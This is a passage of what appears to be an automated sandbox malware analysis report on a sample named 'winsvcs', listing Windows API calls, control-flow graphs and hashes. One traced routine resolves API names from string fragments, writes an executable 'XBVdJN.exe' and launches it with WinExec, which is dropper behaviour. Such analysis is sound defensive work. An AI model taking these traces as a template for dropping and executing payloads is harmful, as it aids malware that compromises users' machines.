                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D93A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D9CE
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040DA72
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DB57
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DBAA
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DC30
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040DDA1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DE71
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DEC4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DF4A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E05E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E114
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E167
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040E1F4
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040E297
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E363
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
                                                                                                                                                                                                                          • GetDC.USER32(0044A660), ref: 0040E41B
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E447
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E461
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E502
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E606
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E657
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040E817
                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
                                                                                                                                                                                                                          • SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
                                                                                                                                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 0040EB99
                                                                                                                                                                                                                          • BeginPaint.USER32(0044A660,?), ref: 0040EBAE
                                                                                                                                                                                                                          • IsRectEmpty.USER32(?), ref: 0040EBBC
                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 0040EBCE
                                                                                                                                                                                                                          • SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
                                                                                                                                                                                                                          • EndPaint.USER32(0044A660,?), ref: 0040EBF4
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC12
                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0040EC28
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
                                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC6E
                                                                                                                                                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0040ECE2
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040ECF1
                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 0040ED25
                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0040ED53
                                                                                                                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 0040ED67
                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040ED7C
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040ED96
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040EDAC
                                                                                                                                                                                                                          • StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
                                                                                                                                                                                                                          • _printf.LIBCMT ref: 0040EDFB
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0040EE12
                                                                                                                                                                                                                          • EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 0040EE2A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCompatibleCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
                                                                                                                                                                                                                          • String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
                                                                                                                                                                                                                          • API String ID: 1152109118-461452962
                                                                                                                                                                                                                          • Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 255 479044-479074 GetPEB 256 479077-47909a 255->256 257 47909d-4790a0 256->257 258 4790a6-4790bc 257->258 259 4791ee-47922b CreateFileA 257->259 260 479110-479116 258->260 261 4790be-4790c5 258->261 276 479265-479269 259->276 277 47922d-479230 259->277 264 479129-47912f 260->264 265 479118-47911f 260->265 261->260 262 4790c7-4790ce 261->262 262->260 268 4790d0-4790d7 262->268 266 479131-479138 264->266 267 479148-47914e 264->267 265->264 269 479121-479124 265->269 266->267 271 47913a-479141 266->271 272 479167-47916f 267->272 273 479150-479157 267->273 268->260 274 4790d9-4790dd 268->274 270 4791bb-4791c0 269->270 279 4791c2-4791c5 270->279 280 4791e0-4791e9 270->280 271->267 278 479143-479146 271->278 282 479171-479178 272->282 283 479188-47918e 272->283 273->272 281 479159-479160 273->281 274->260 284 4790df-4790e3 274->284 285 479232-479238 277->285 278->270 279->280 286 4791c7-4791ca 279->286 280->257 281->272 287 479162-479165 281->287 282->283 288 47917a-479181 282->288 290 4791a7-4791ad 283->290 291 479190-479197 283->291 284->270 289 4790e9-47910b 284->289 293 479246-479252 WriteFile 285->293 294 47923a-479242 285->294 286->280 295 4791cc-4791cf 286->295 287->270 288->283 296 479183-479186 288->296 289->256 290->270 292 4791af-4791b6 290->292 291->290 297 479199-4791a0 291->297 292->270 298 4791b8 292->298 300 479255-479262 FindCloseChangeNotification WinExec 293->300 294->285 299 479244 294->299 295->280 301 4791d1-4791d4 295->301 296->270 297->290 303 4791a2-4791a5 297->303 298->270 299->300 300->276 301->280 304 4791d6-4791d9 301->304 303->270 304->280 305 4791db-4791de 304->305 305->259 305->280
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,FFFADB8B,00003E00,?,00000000), ref: 00479252
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00479256
                                                                                                                                                                                                                          • WinExec.KERNEL32(?,00000005), ref: 00479262
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607456736.0000000000479000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00479000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_479000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                                                                                                                                                                                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
                                                                                                                                                                                                                          • API String ID: 2234911746-4190719182
                                                                                                                                                                                                                          • Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 306 40fcc0-40fd91 call 40fe50 CreatePen 309 40fd96-40fdcb 306->309 309->309 310 40fdcd-40fe44 CreateFontIndirectA GetSysColor 309->310
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreatePen.GDI32(00000000), ref: 0040FD85
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0040FE0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create$ColorFontIndirect
                                                                                                                                                                                                                          • String ID: Taho$dD
                                                                                                                                                                                                                          • API String ID: 4251253423-4141250355
                                                                                                                                                                                                                          • Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 311 429b0c-429b2e HeapCreate 312 429b32-429b3b 311->312 313 429b30-429b31 311->313
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00429B21
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                          • Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 314 2203894-22038c3 call 2203424 VirtualProtect
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022038B7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction ID: d43e4f0160e33e4b86f6d923a457dd7dc1ac031816dfab441df1ea1bb82745ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE07E7590020CAFCF01DF94D94589DBBB5FB08200F008199ED54A6351D6319A20EF51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 317 2203904-220392a call 2203424 LoadLibraryA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0220391E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction ID: 9f716a816eb73af6f75569a39d58e3a4324907b908df6543db8dc9be5095fb09
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16D04274D0020CAF8B00EFA9D54589CFBF5EB08200F1081AAEC04A7351E631AA50DF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 320 40fc5d-40fc6c InvalidateRect call 423ae8 322 40fc71-40fc89 320->322
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
